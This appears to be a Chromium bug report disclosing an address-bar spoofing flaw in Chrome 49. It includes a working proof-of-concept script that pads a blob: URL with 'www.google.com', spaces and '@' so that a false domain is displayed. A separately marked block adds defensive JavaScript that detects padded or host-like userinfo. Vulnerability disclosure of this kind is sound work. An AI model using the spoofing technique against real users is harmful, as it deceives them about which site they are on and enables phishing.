Address bar better spoofing via blob URL
Reported by masa....@gmail.com, Apr 21 2016
Issue description

UserAgent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36

Steps to reproduce the problem:
1. Visit POC.html (https://output.jsbin.com/yeloqaf/):

<script>
function poc(){
  // Helper window: after 2 s, write a marker into the opener, refocus it, and close.
  w=window.open('about:blank','_blank');
  w.eval('setTimeout("opener.document.write(/pkav~/);opener.focus();window.close();",2000)');
  // After 1 s, navigate to a blob: URL made of 'www.google.com', a long run of spaces, '@', then this page's real host.
  setTimeout("location='blob:"+location.protocol+"//www.google.com"+Array(1000).join(' ')+'@'+location.host+"';",1000)
}
</script>
<button onclick="poc()">Boom!</button>

2. Click button 'Boom!'.
3. Wait 1s, see address bar

What is the expected behavior?
Address Bar display: yourdomain

What went wrong?
Address Bar display: blob:https://www.google.com

Did this work before? No

Chrome version: 49.0.2623.112  Channel: stable
OS Version: 10.0
Flash Version: Shockwave Flash 21.0 r0

The POC works in Chrome for Windows and Chrome for Android, but Chrome for OSX has a '...' :)
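The URL shape in the report can be checked on the defensive side. The following is an added example, not part of the original report and not Chromium's code: it splits the authority at the last '@' to find the real host, flags host-like or padded userinfo, and builds a display string that drops the userinfo. The function name `inspectForDisplay`, the finding labels, the simplified authority parsing, and the hosts `attacker.example` and `app.example` are assumptions made for illustration.

```javascript
// Added example, not Chromium's code. Simplified authority parsing (assumption):
// scheme://[userinfo@]host[:port], optionally wrapped in "blob:".
function inspectForDisplay(raw) {
  let rest = String(raw).trim();
  const isBlob = /^blob:/i.test(rest);
  if (isBlob) rest = rest.slice(5);

  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/?#]*)/i.exec(rest);
  if (!m) return { ok: false, realHost: null, display: null, findings: ['unparseable'] };

  const scheme = m[1].toLowerCase();
  const authority = m[2];
  // Everything before the LAST '@' is userinfo; the host is what follows it.
  const at = authority.lastIndexOf('@');
  const userinfo = at >= 0 ? authority.slice(0, at) : '';
  const hostPort = authority.slice(at + 1).toLowerCase();

  const findings = [];
  if (at >= 0) findings.push('userinfo-present');
  // Whitespace (raw or percent-encoded) pushes the real host out of view.
  if (/\s|%20/i.test(userinfo)) findings.push('padding-in-userinfo');
  // Userinfo that starts like a dotted hostname is what the user would misread.
  if (/^[a-z0-9-]+(\.[a-z0-9-]+)+/i.test(userinfo)) findings.push('userinfo-looks-like-host');
  if (hostPort === '' || /\s/.test(hostPort)) {
    return { ok: false, realHost: null, display: null,
             findings: findings.concat('invalid-host') };
  }

  const realHost = hostPort.replace(/:\d+$/, '');
  // Display only scheme and real host; userinfo is never shown.
  const display = (isBlob ? 'blob:' : '') + scheme + '://' + hostPort;
  return { ok: findings.length === 0, realHost, display, findings };
}

// Constructed sample shaped like the URL in the report; the host is a placeholder.
const spoofed = 'blob:https://www.google.com' + ' '.repeat(999) + '@attacker.example';
// Constructed benign blob URL for comparison.
const benign = 'blob:https://app.example/0f3c';

console.log(inspectForDisplay(spoofed));
console.log(inspectForDisplay(benign));
```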
Apr 21 2016
What happened?
Apr 21 2016
Oct 2 2016
Apr 23 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by masa....@gmail.com, Apr 21 2016